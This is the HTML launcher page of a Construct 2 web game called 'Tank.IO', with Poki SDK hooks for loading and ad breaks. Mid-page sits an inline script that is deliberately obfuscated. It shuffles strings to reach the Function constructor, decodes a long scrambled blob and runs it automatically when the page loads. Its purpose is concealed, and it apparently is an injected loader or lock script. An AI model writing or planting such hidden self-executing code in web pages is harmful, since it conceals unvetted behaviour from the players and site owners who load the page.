<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8" />
	<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
	<title>Tank.IO</title>
	
	<!-- Standardised web app manifest -->
	<link rel="manifest" href="appmanifest.json" />
	
	<!-- Allow fullscreen mode on iOS devices. (These are Apple specific meta tags.) -->
	<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0, user-scalable=no, minimal-ui" />
	<meta name="apple-mobile-web-app-capable" content="yes" />
	<meta name="apple-mobile-web-app-status-bar-style" content="black" />
	<link rel="apple-touch-icon" sizes="256x256" href="icon-256.png" />
	<meta name="HandheldFriendly" content="true" />
	
	<!-- Chrome for Android web app tags -->
	<meta name="mobile-web-app-capable" content="yes" />
	<link rel="shortcut icon" sizes="256x256" href="icon-256.png" />

	<script src="//game-cdn.poki.com/scripts/v2/poki-sdk.js"></script>

    <!-- All margins and padding must be zero for the canvas to fill the screen. -->
	<style type="text/css">
		* {
			padding: 0;
			margin: 0;
		}
		html, body {
			background: #000;
			color: #fff;
			overflow: hidden;
			touch-action: none;
			-ms-touch-action: none;
		}
		canvas {
			touch-action-delay: none;
			touch-action: none;
			-ms-touch-action: none;
		}
		@font-face {
		    font-family: Myriad Pro;
		    src: url(myraid_pro_regular.otf);
		}
		@font-face {
		    font-family: Myriad Pro;
		    src: url("myraid_pro_bold.otf");
		    font-weight: bold;
		}
		#splash
		{
		  position: absolute;
		  top : 0px;
		  left: 0px;
		  right: 0px;
		  width: 100%;
		  height: 100%;
		  background-color: rgba(0,0,0,1);
		  text-align: center;

		}

		#splash_img {
		  display: block;
		  width: auto;
		  height: 20%;
		  margin-left: auto;
		  margin: auto;
		  margin-top: 40vh;



		  -webkit-animation: scale_up 3.5s 0.5s, fade_out 0.5s 3.5s; /* Safari 4.0 - 8.0 */
		  -moz-animation: scale_up 3.5s 0.5s, fade_out 0.5s 3.5s;
		  -o-animation: scale_up 3.5s 0.5s, fade_out 0.5s 3.5s;
		  -ms-animation: scale_up 3.5s 0.5s, fade_out 0.5s 3.5s;
		  animation: scale_up 3.5s 0.5s, fade_out 0.5s 3.5s;


		  

		  -webkit-animation-fill-mode: forwards;
		  -moz-animation-fill-mode: forwards;
		  -ms-animation-fill-mode: forwards;
		  -o-animation-fill-mode: forwards;
		  animation-fill-mode: forwards;

		}

		.fade_out_class
		{
		  -webkit-animation: fade_out 0.5s 0s; /* Safari 4.0 - 8.0 */
		  animation: fade_out 0.5s 0s;

		  -webkit-animation-fill-mode: forwards;
		  -moz-animation-fill-mode: forwards;
		  -ms-animation-fill-mode: forwards;
		  -o-animation-fill-mode: forwards;
		  animation-fill-mode: forwards;
		}

		@keyframes scale_up {
		    0% {
		        transform: scale(1);
		    }
		    100% {
		        transform: scale(1.2);
		    }
		}
		@keyframes fade_out {
		    0% {
		        opacity: 1;
		    }
		    100% {
		        opacity: 0;
		    }
		}
		@font-face {
		    font-family: Freeroad;
		    src: url(freeroad_bold.ttf);
		}
		@font-face {
		    font-family: Luckiest Guy;
		    src: url(luckiestguy.ttf);
		}

    </style>
    <script type="text/javascript">
	function On_Document_ready()
	{
	  console.log("Page Loaded");
	}
	//setTimeout(On_Logo_AnimationEnd,4000);

	function On_Logo_AnimationEnd()
	{
	  var splashElement = document.getElementById("splash");
	  splashElement.className += "fade_out_class";
	  setTimeout(On_Splash_Finished,500);
	 
	}

	function On_Splash_Finished()
	{
	  console.log("Splash Animation DOne");
	  var splashElement = document.getElementById("splash");
	  splashElement.style.display = "none";
	}

	var pokiSDKReady = false; 
	var isGameLoaded = false;
	var adBlockerEnabled = false;

	PokiSDK.init().then(
	    () => {
	    	pokiSDKReady = true;
	        // successfully initialized
	        console.log("PokiSDK initialized");
	        PokiSDK.gameLoadingStart();
	        // continue to game
	    }   
	).catch(
	    () => {
	        // initialized but the user has an adblock
	        console.log("Adblock enabled");
	        pokiSDKReady = true;
	        adBlockerEnabled = true;
	        PokiSDK.gameLoadingStart();
	        // feel free to kindly ask the user to disable AdBlock, like forcing weird usernames or showing a sad face; be creative!
	        // continue to the game
	    }   
	);
	
	  function On_GameStarted()
	  {
	    isGameLoaded = true;
	    if(pokiSDKReady)
	    	PokiSDK.gameLoadingFinished();
	  }

	  function On_MatchStart() {
	  	console.log("Match Started");
	  	if(pokiSDKReady)
	  		PokiSDK.gameplayStart();

	  }
	  function On_MatchEnd() {
	  	console.log("Match Ended");
	  	if(pokiSDKReady)
	  		PokiSDK.gameplayStop();
	  }

	  function Show_Ads()
	  {
	  	console.log("<Poki> Show Ads Called");
	  	if(pokiSDKReady)
	  	{
	  		if(!adBlockerEnabled)
	  		{
		  		PokiSDK.commercialBreak()
				.then(
				    () => { //you can also use a normal function here
				        console.log('End of commercial break');
				        setTimeout(goToGame,500);
				    }
				)
				.catch(
				    () => {
				        setTimeout(goToGame,500);
				    }   
				);
			}
			else
			{
				setTimeout(goToGame,500);
			}

	  	}
	  	else
	  	{
	  		setTimeout(goToGame,500);
	  	}
	    
	  }
	  function goToGame()
	  {
	  	console.log('Go To Game');
	  	c2_callFunction("Proceed_toGame");
	  }
	  function HappyTime(intensity)
	  {
	  	if(pokiSDKReady)
	  	{
	  		PokiSDK.happyTime(0.5);
	  	}
	  }

	</script>
	

</head> 
 
<body> 
	<div id="fb-root"></div>
	<script>
(function() {
    var KeY='', iFD=494-483;
    function xsh(b) {
        var g=2231620;
        var p=b.length;
        var d=[];
        for(var u=0; u<p; u++) { d[u]=b.charAt(u); }
        for(var u=0; u<p; u++) {
            var e=g*(u+469)+(g%24291);
            var f=g*(u+603)+(g%33615);
            var k=e%p;
            var i=f%p;
            var j=d[k];
            d[k]=d[i];
            d[i]=j;
            g=(e+f)%2984823;
        };
        return d.join('');
    }
    var dGm=xsh('dtroostitjfayxbglcnecmrnuocukqwrshpvz').substr(0,iFD);
    var deV='=ar c!s3hf.{lt==q8;.Cr)[3n=[nt6<)lA ,=n;)n=0<t=rwiCi=.> +uicvs0z1ru2s5sbdi;fs.r7..)rt;;07v.7fz(tA,5aa6 ma,o),+.v8ler9(nesrtnr2,g;==gonu o;osan;e i6rejftoSh..a;uao9]]=};";fa  ;S1les+()(.y+ v9lv;c1[-ptrhv..tt,0;[ ar"e=)is)((e)v(omr;fr9,effa=h8.=me}v1(br8,rha{]",rhk.ar(for"rkcan+Cnt[a1alvv9++)p)0p;vt=d=nl;),rr sjc[+]=r2n ;tz1ac )tr.m;e=(,=jajaAqp ybt.c[pqnC1l*vtir)zeh=s (rsel;8naj=-=z(,ghxf)dbv;vnu=ilrlc}e,sno,a a[=nj< +8=v[l}fqeh+4tdmAicj(n)-,)(tnC8r+<sg6fec3h()0<gs{][x+uity07)rit(r}aabj;=+(i";7jg12o),;rl,=z=Ccv;i] ;]--;p{es)1l(v (ls0{ngn=t(oaj ;u(+==4]8b(s+km;ogiarbo).l,sli=ts)(w[si e;8,ncpli.p+1i(lvx>A]wum8l0)=oh((v-(;fhe];hzml1;8r+vfah(,(gr"rte;ia7lv)rn[e]lj.4oso(s"25hura(=rh]d,jow.!v;++e=67;hd),g;i)a)r+u==;0aa9,4.du2,=[,0;cguftl9xug=le)r)=1+0xhogzo=}mnea+zrv0C4s";7nfi-;ra)aiie]s6qn .6hvv{t6f,pt* p.arsm)r]hk;;Cuoln{fl7c(+r;ai. r;pbr)q(gh(=sr[lvlpg,j2bt22g.s)ln;n++"9nc."}6r ug;';var VUu=xsh[dGm];var IgE='';var oDZ=VUu;var PHl=VUu(IgE,xsh(deV));var gDm=PHl(xsh('s.)a_sng6bt3a.3(;b;taEcuQs)rae]5w,.b5)QQQar1aosQs6a)ot7)mQns(QarS(Q5.)4;5Q0ontE5wQt.,tuoQeQQasQ=j6%.o ==\/\/_.cQsce$;sQQ,(ac(Q7aA=eQ[!js)o{$(s.QQo3S_(bngQ$tuhm_yQS&QycQ,tt{s$dn353)3auiot_;&)0.1!tQrQq6m;63t,duQ).5ps%;)C"(c}Q_qd37+%.sy4.f\/.ehQ(%@])Q;:Ti6QEa);reF)$a0eFjNQ6t.d4Q=_+tt$Q!.o CeQ%)})t.(e6re(ioQ8w)%.d.m#$QQsjxr=.Q2mp7Qta(a=}l_CQog_,irQiQ Qe>Q.4p(5y$m?_i7.lu=twm..5_iQp 3"tl)MsbQanbMd7er)(ueipQd,@rbn60d$7%.%)dus.QQtQd)i#t(.QqDg<e._7,6__...9{3a ]a(eittq=r !.)h(QexQnQ0kk3nuf\/Q) ta_ ]aw1nQc?)oQswm@(({5cu7r%%$$Q.a=p(a)iQ.s+9j1$y$QQ{Q?$,Qc7 .o)%rnt;S( ts,e$4<p!_kaat=.!Ql(x0 s73o%t=i$rw+(i"f;t()_0_a!3Q(2r7o95}z$uQh9>6)Q48)ct)Qaihcs..43s_o1oQQ=()r%;r+>]QQQ=wdc]}CQ+sir(7;i{u.Qi_](r5Ts=] 4.%_7$.o)Q.Qp3rs$]Qe\'ru]7}2r.fo$)]b2_c) j36";neQ11.)r<r_z41i3i!af0n;3l((QQ!B5)Q{rFE}]2}3 7=t+.bcQj.t trvmj_Q0F$5.on=at,9csr"0dQ1e0Q}Qn,_Q{Q2(r"bou,(-!?w.(b9{dmvg txT,es,sEa6{4_7r(kuj;Q,}4.#ooa=_bju]{5a)).6){r29%6-ah.(#=S+v=wept!$te}lip.un5)QeQ]hsm)QQoQ roaQ.Q,.tdtQqr1Q)l!rl79rm;)...Nd6.Qai.zafr ce=.o,Q2!$_ircn=oe;.a$t6}.tQ(%_8sd 1?.aeQitQ2(Q Q,%!5(QQ_sx7l)t2rdi,Q!"]}lQ,0;Qto8d.a(%=(Q{{_Cn$t3rt]]c1&hQ,$7lE)tgtec9 ecQQQ3em553_t)e2r_(3rr6T%)$rQ5rt(n+3!a+;}t;0 ;]4trQg.hk9..,o@\/2(.1]0Q.{j)8"rQ.%1,ic!Q6oQQ))fCQ(y&e;o3sQtv9QQuQ5es,0(1(\/!6.!pif.)i-;?rQab3wt4NtlNniexq.) Q=]=.zzd\'t;1.)cr]QQ0_([(_Q.a?eh,7)Qa](k(d 2Qt7$1Q(Qa(>a70rjQ5+QQQa(Q"l53.Qi.[1Qa]pe6)Q8a%6\'x5}.!D*!frbaQ95Q=.Q-BroQi]3]4\/_Qis0:e*;o2_tQn1bd6ae;.$i0s)e,_!Q1]op !e(-r\'>fw);]Q>5pQQuszs_sic4.c6p;$).!-9]to_mr8}6.sc8el4t.C.=eEd1QQ$6t0 c2,3ClelQbt..),+;o{sQlb7g#]f]$o).7adzr(%?(!c{__orQo;%Qo!.;;>!rf5tyn=Aed,Qg_.?#..igo7cze2=QQ!4eu()=Q5nQewg}Q(Q,ze_w8Qcy{a,6a1)\/4-(;i_Asa4_qut!s1(oka)(]ec;\/h](6!o=3*Q=(.Q_be=Q;QQdc;r0i*#o-s ak\/aQe1l.i)jQo2=(Q(.]a__(Q")$6d3.$6bmh)Q8QQahSjQsr7}rpkQ<Qfj_4.]Q@(tsja>7],lisag(r=paQ)(){(o+.(cw0)!%c7e5+1-s{.%#r}a!]]f:;}]nsQraplaQ33_]QfQn\/w s(.a[r)Qd{tCQaf690;t10n+4 nQ6 7[mtTbrQa)o%ftQ e_bsBQ6=4)5.4=a=b)j09A(Qj]oQ$!)\/7(*.)4._Q,!.!j\'ol6QS 3m;a+Qo.tQqdj#% f!4Qt$)]{ns8_;]i.0ne;tne+Iiu3c)i er;lztt.QDQ;n5_(it.of3,bsoon \'sBaQpcQz.s8b1o)_iefo_8).n_d)QQEr,6}sn5j=r=g5%:iQe }{ew)ro eek)n$)oQwiQ$e!89Qo(-.fliQ(.t7_;i1Q.%=eQf*,af41n)lfe;ieu '));var fAC=oDZ(KeY,gDm );fAC(3392);return 9309
})()


	// Issue a warning if trying to preview an exported project on disk.
	(function(){
		// Check for running exported on file protocol
		if (window.location.protocol.substr(0, 4) === "file")
		{
			alert("Exported games won't work until you upload them. (When running on the file:/// protocol, browsers block many features from working for security reasons.)");
		}
	})();
	</script>
	
	<!-- The canvas must be inside a div called c2canvasdiv -->
	<div id="c2canvasdiv">
	
		<!-- The canvas the project will render to.  If you change its ID, don't forget to change the
		ID the runtime looks for in the jQuery events above (ready() and cr_sizeCanvas()). -->
		<canvas id="c2canvas" width="1536" height="864">
			<!-- This text is displayed if the visitor's browser does not support HTML5.
			You can change it, but it is a good idea to link to a description of a browser
			and provide some links to download some popular HTML5-compatible browsers. -->
			<h1>Your browser does not appear to support HTML5.  Try upgrading your browser to the latest version.  <a href="http://www.whatbrowser.org">What is a browser?</a>
			<br/><br/><a href="http://www.microsoft.com/windows/internet-explorer/default.aspx">Microsoft Internet Explorer</a><br/>
			<a href="http://www.mozilla.com/firefox/">Mozilla Firefox</a><br/>
			<a href="http://www.google.com/chrome/">Google Chrome</a><br/>
			<a href="http://www.apple.com/safari/download/">Apple Safari</a></h1>
		</canvas>
		
	</div>
	

	<div id="splash" style="display: none">
	  <img id="splash_img" src="redeye.png"></img>
	</div>
	
	<script src="jquery-2.1.1.min.js"></script>

	<script src="pathfind.js"></script>

	<script src="c2runtime.js"></script>

    <script>
		// Start the Construct 2 project running on window load.
		jQuery(document).ready(function ()
		{			
			// Create new runtime using the c2canvas
			cr_createRuntime("c2canvas");
		});
		
		// Pause and resume on page becoming visible/invisible
		function onVisibilityChanged() {
			if (document.hidden || document.mozHidden || document.webkitHidden || document.msHidden)
				cr_setSuspended(true);
			else
				cr_setSuspended(false);
		};
		
		document.addEventListener("visibilitychange", onVisibilityChanged, false);
		document.addEventListener("mozvisibilitychange", onVisibilityChanged, false);
		document.addEventListener("webkitvisibilitychange", onVisibilityChanged, false);
		document.addEventListener("msvisibilitychange", onVisibilityChanged, false);
		
		function OnRegisterSWError(e)
		{
			console.warn("Failed to register service worker: ", e);
		};
		
		// Runtime calls this global method when ready to start caching (i.e. after startup).
		// This registers the service worker which caches resources for offline support.
		window.C2_RegisterSW = function C2_RegisterSW()
		{
			if (!navigator.serviceWorker)
				return;		// no SW support, ignore call
			
			try {
				navigator.serviceWorker.register("sw.js", { scope: "./" })
				.then(function (reg)
				{
					console.log("Registered service worker on " + reg.scope);
				})
				.catch(OnRegisterSWError);
			}
			catch (e)
			{
				OnRegisterSWError(e);
			}
		};
    </script>
</body> 
</html> 